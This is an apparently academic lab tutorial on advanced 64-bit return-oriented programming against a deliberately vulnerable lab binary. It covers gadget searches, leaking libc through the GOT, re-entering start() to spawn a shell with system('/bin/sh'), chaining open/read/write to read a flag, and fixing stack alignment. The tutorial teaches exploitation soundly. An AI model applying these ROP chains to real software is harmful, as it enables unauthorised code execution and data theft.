Tut06: Advanced ROP

In the last tutorial, we leveraged the leaked code and stack pointers in our control hijacking attacks. In this tutorial, we will exploit the same program without having any information leak, but most importantly, in x86_64 (64-bit).

Step 0. Understanding the binary

$ checksec ./target
[*] '/home/lab06/tut06-advrop/target'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

DEP (NX) is enabled so pages not explicitly marked as executable are not executable, but PIE is not enabled, meaning that ASLR is not fully enabled and the target executable's image base is not randomized. Note that the libraries, heap and stack are still randomized. Fortunately, like the previous tutorial, the canary is not placed; it means that we can still smash the stack and hijack the very first control flow.

[Task] Your first task is to trigger a buffer overflow and control rip.

You can control rip with the following payload:

  [buf  ]
  [.....]
  [ra   ] -> func
  [dummy]
  [.....] -> arg?

Step 1. Controlling arguments in x86_64

However, unlike x86, we can not control the arguments of the invoked function by overwriting the stack. Since the target binary is built for x86_64, rdi should instead contain the first argument.

In the last tutorial, we just used the pop; ret gadget for clearing up the stack, but this can be leveraged for controlling registers. For example, after executing pop rdi; ret, you are now controlling the value of a register (rdi = arg1) from the overwritten stack.

Let's control the argument with the following payload:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ]
  [ra   ] -> puts()
  [ra   ]

Since our binary is not PIE-enabled, we can still search gadgets in the code section.

  1. looking for the pop gadget.
$ ropper --file ./target --search "pop rdi; ret"
...
[INFO] File: ./target
0x00000000004008d3: pop rdi; ret;

What about puts() of the randomized libc?

  1. looking for puts().

Although the actual implementation of puts() is in the libc, we can still invoke puts() by using the resolved address stored in its GOT.

Do you remember how the program invoked an external function via PLT/GOT, like this? In other words, we can still invoke by jumping into the plt code of puts():

0x0000000000400600 <puts@plt>:
+--0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()
|
| (first time)
+->0x400646: push   0x0                    # index of puts()
|  0x40064b: jmp    0x4005f0 <.plt>        # resolve libc's puts()
|
| (once resolved)
+--> puts() @libc

0x0000000000400767 <start>:
   ...
   400776: call   0x4006a0 <puts@plt>

pwndbg also provides an easy way to look up plt routines in the binary:

pwndbg> plt
0x400600: puts@plt
0x400610: printf@plt
0x400620: memset@plt
0x400630: geteuid@plt
0x400640: read@plt
0x400650: strcmp@plt
0x400660: setreuid@plt
0x400670: setvbuf@plt

[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary read primitive.

Your payload should look like:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "Password OK :)"
  [ra   ] -> puts@plt
  [ra   ] (crashing)

Step 2. Leaking libc's code pointer

Although the process image has lots of interesting functions that we can abuse, it misses much powerful functions such as system() that allows us for arbitrary execution. To invoke arbitrary libc functions, we first need to leak code pointers pointing to the libc image.

Which part of the process image contains libc pointers? GOT! The below code is to bridge your invocation from puts@plt to the puts@libc by using the real address of puts() in GOT.

0x0000000000400600 <puts@plt>:
   0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()

What's the address of puts@GOT? It's rip + 0x200a12 so 0x400606 + 0x200a12 = 0x601018 (rip pointing to the next instruction).

Again, pwndbg provides a convenient way to look up GOT of the binary as well.

pwndbg> got

GOT protection: Partial RELRO | GOT functions: 10

[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7a64a30 (puts) ◂— push   r13
[0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7a48f00 (printf) ◂— sub    rsp, 0xd8
...

[Task] Let's leak the address of puts of libc!

Your payload should look like:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt
  [ra   ] (crashing)

Note that the output of puts() might not be 8 bytes (64-bit pointer), as its address contains multiple zeros (i.e., NULL-byte for puts()) in the most significant bytes.

Step 3. Preparing Second Payload

Now what? We can calculate the base of libc from the leaked puts(), so we can invoke all functions in libc? Perhaps, like below:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"@libc
  [ra   ] -> system()@libc
  [ra   ] (crashing)

In fact, when you are preparing the payload, you don't know the address of libc; the payload leaking the puts@GOT is not yet executed.

Among all the places we know, is there any place we can continue to interact with the process? Yes, the start() function! Our plan is to execute start(), resolve the address of libc, and smashing the stack once more.

[Task] Jump to start() that has the stack overflow. Make sure that you indeed see the program banner once more!

payload1:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> start

The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP once more to invoke system() with the resolved addresses.

[Task] Invoke system("/bin/sh")!

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"
  [ra   ] -> system@libc

Step 4. Advanced ROP: Chaining multiple functions!

Similar to the last tutorial, we will invoke a sequence of calls to read the flag.

(assume: symlinked anystring -> /proc/flag)

1) open("anystring", 0)
2) read(3, tmp, 1040)
3) write(1, tmp, 1040)
  1. Invoking open()

To control the second argument, we need a gadget that pops rsi (pointing to the second argument in x86_64) and returns.

$ ropper --file ./target --search 'pop rsi; ret'
<.. Nop ..>

Although the target binary doesn't have the pop rsi; ret but there is one effectively identical.

$ ropper --file ./target --search 'pop rsi; pop %; ret'
...
0x00000000004008d1: pop rsi; pop r15; ret;

So invoking open() is pretty doable:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "anystring`

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> 0
  [dummy] (r15)

  [ra   ] -> open()
  1. Invoking read()

To invoke read(), we need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have a proper gadget available.

What should we do? In fact, at this point, we know the address of the libc image and we can chain the rop by using its gadget!

$ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret'
0x0000000000001b96: pop rdx; ret;
...

Your payload should look like this:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> 3

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> tmp
  [dummy] (r15)

  [ra   ] -> pop rdx; ret
  [arg3 ] -> 1040

  [ra   ] -> read()

[Task] Your final task is to chain open/read/write, and get the real flag from target-seccomp!

What if either PIE or ssp (stack canary) is enabled? Do you think we can exploit this vulnerability?

Tips on handling stack alignment issues

When returning to the libc functions in a 64 bit binary through a ROP chain, you can encounter a situation where the program segfaults on movaps instruction in buffered_vfprintf() or do_system() functions, as shown in the core dump below:

$ gdb-pwndbg ./target-seccomp core
Reading symbols from ./target-seccomp...
Program terminated with signal SIGSEGV, Segmentation fault.
...
 RBP  0x7ffe05c19d58 —▸ 0x7ffe05c19e68 ◂— 'BBBBBBBB\n'
 RSP  0x7ffe05c17678 —▸ 0x7ffe05c17759 ◂— 0x0
 RIP  0x7f5a4e17c75e ◂— 0x848948502444290f
────────────────────────────────[ DISASM ]─────────────────────────────────
 ► 0x7f5a4e17c75e    movaps xmmword ptr [rsp + 0x50], xmm0
   0x7f5a4e17c763    mov    qword ptr [rsp + 0x108], rax
   0x7f5a4e17c76b    call   0x7f5a4e179490 <0x7f5a4e179490>

This is because some of the 64 bit libc functions require your stack to be 16-byte aligned, i.e., the address of $rsp ending with 0, when they are called. The below shows a violation of this constraint:

*RSP  0x7fffc4cb3bb8 —▸ 0x400767 (start) ◂— push   rbp
*RIP  0x7f6636241140 (read) ◂— lea    rax, [rip + 0x2e0891]
────────────────────────────────[ DISASM ]────────────────────────────────
   0x4008d4       <__libc_csu_init+100>    ret
    ↓
   0x7f6636234d69 <_getopt_internal+89>    pop    rdx
   0x7f6636234d6a <_getopt_internal+90>    pop    rcx
   0x7f6636234d6b <_getopt_internal+91>    pop    rbx
   0x7f6636234d6c <_getopt_internal+92>    ret
    ↓
 ► 0x7f6636241140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f66365219d8>
   0x7f6636241147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f6636241149 <read+9>                 test   eax, eax
   0x7f663624114b <read+11>                jne    read+32 <read+32>

Here, $rsp at the beginning of read is 0x7fffc4cb3bb8, which is not 16-byte aligned. When we continue, the program ends up segfaulting on the aforementioned movaps instruction.

How can we deal with such situation? More specifically, how can we adjust our data on the stack to be aligned?

You can add an extra ret in the beginning of your ROP chain. When ret is invoked, it increments $rsp by 8 (you already know why!). Thus, you can simply add a dummy ret to make $rsp 16-byte aligned. There are many ret instructions in the binary. You can pick one and add it to your ROP chain. If you already have the address of a pop rdi; ret gadget, you can add 1 to the address to get the address of ret (pop rdi is a one-byte instruction).

For example, the payload shown in Step 4 can be revised to:

payload2:

  [buf  ]
  [.....]
  [ra   ] -> ret // dummy return is added to align the stack!
  [ra   ] -> pop rdi; ret // followed by your original rop chain
  [arg1 ] -> 3

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> tmp
  [dummy] (r15)

  [ra   ] -> pop rdx; ret
  [arg3 ] -> 1040

  [ra   ] -> read()

Verifying in GDB that the dummy ret is added to the ROP chain (right after the end of start):

 ► 0x4007eb <start+132>              ret             <0x4008d4; __libc_csu_init+100>
    ↓
   0x4008d4 <__libc_csu_init+100>    ret // THIS IS THE ADDED RET
    ↓
   0x4008d3 <__libc_csu_init+99>     pop    rdi
   0x4008d4 <__libc_csu_init+100>    ret

As a result, when returning into read, $rsp now ends with 0 (16-byte aligned):

*RSP  0x7ffe49f96c60 —▸ 0x400767 (start) ◂— push   rbp
*RIP  0x7f4bc3bc5140 (read) ◂— lea    rax, [rip + 0x2e0891]
────────────────────────────────[ DISASM ]────────────────────────────────
   0x4008d4       <__libc_csu_init+100>    ret
    ↓
   0x7f4bc3bb8d69 <_getopt_internal+89>    pop    rdx
   0x7f4bc3bb8d6a <_getopt_internal+90>    pop    rcx
   0x7f4bc3bb8d6b <_getopt_internal+91>    pop    rbx
   0x7f4bc3bb8d6c <_getopt_internal+92>    ret
    ↓
 ► 0x7f4bc3bc5140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f4bc3ea59d8>
   0x7f4bc3bc5147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f4bc3bc5149 <read+9>                 test   eax, eax
   0x7f4bc3bc514b <read+11>                jne    read+32 <read+32>

Reference